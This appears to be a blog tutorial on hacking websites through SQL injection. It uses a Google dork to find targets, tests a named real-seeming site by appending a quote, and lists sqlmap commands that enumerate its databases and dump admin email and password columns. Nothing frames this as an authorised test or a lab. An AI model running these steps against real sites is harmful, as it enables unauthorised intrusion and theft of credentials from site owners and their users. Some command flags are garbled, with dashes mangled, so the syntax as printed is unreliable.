Most Easy Way To Hack Database With SQLMap

Introduction To SQL Injection

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).SQL injection must exploit a security vulnerability in an application’s software. For example, when user input is either incorrectly filtered for string literalescape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites. But can be used to attack any type of SQL database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data. It can cause repudiation issues such as voiding transactions or changing balances. It can allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What is SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Step 1: Find a website which can be Vulnerable

We will use Google Dork string to find Vulnerable website which can be SQLMAP SQL injectable.

You can click on this link to know more about Google Dorks

We will use Google Dork Syntax given below.

inurl:index.php?id=

Then Google will show us all sites with our dork in their url. They will look like this.

“ http://www.tunesoman.com/product.php?id=200 “

Now we will check weather the website is vulnerable or not by adding single quotation mark ‘ at the end of the URL

http://www.tunesoman.com/product.php?id=200’

If the page returns an SQL error, the page is vulnerable to SQL injection. See the example of sql error in below

Now we have the site vulnerable for our attack

Step 2: Now Open SQLMAP

Open SQLMAP in the terminal. If you want to see more information about SQLMAP then type “sqlmap — help”. It will give you all the options which are used while performing SQLMAP. let’s see the screenshot below

To find the databases behind the web site, we need to type the following command in the terminal:-

sqlmap –u the enire URL of the vulnerable web page — dbs

In our case:-

sqlmap –u http://www.tunesoman.com/product.php?id=200 — dbs

-u option is used for url

–dbs is used to enumerate DBMS databases

When we run this command on our target url we get the results shown below.

Here we can see the 2 databases are available

Now see I have highlighted the two available databases, information_schema and db363851433. Information schema is included in every MySQL installation. It includes information on all the objects in the MySQL instances, But it does not contains any data valuable for us. Although it can be beneficial to explore those databases to find objects in all the databases in the instance. We will focus our attention on the database here, db363851433 that may have some valuable information. Let’s explore it further.We can retrieve all the tables which are present in database db363851433 by using following command

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –tables

Here we can see the list of the all avalible tables.

Now I want to find more information about admin_user table then type the following command

Now I want to gain more information about admin_user table then type the following command

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –columns

The above command will give us list of all the columns avalible in admin_user table.

Here we can see the all avalible columns of selected table.

Now I want to find the attribute values such as “ admin_email , admin_pass ” present in the table “ admin_user “

Then I will type the following command:-

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –C admin_email,admin_pass –dump

Now it will show us all the entries in the columns we provided.

In this way we can hack the database in very simple way.

Leave a Reply

Your email address will not be published. Required fields are marked *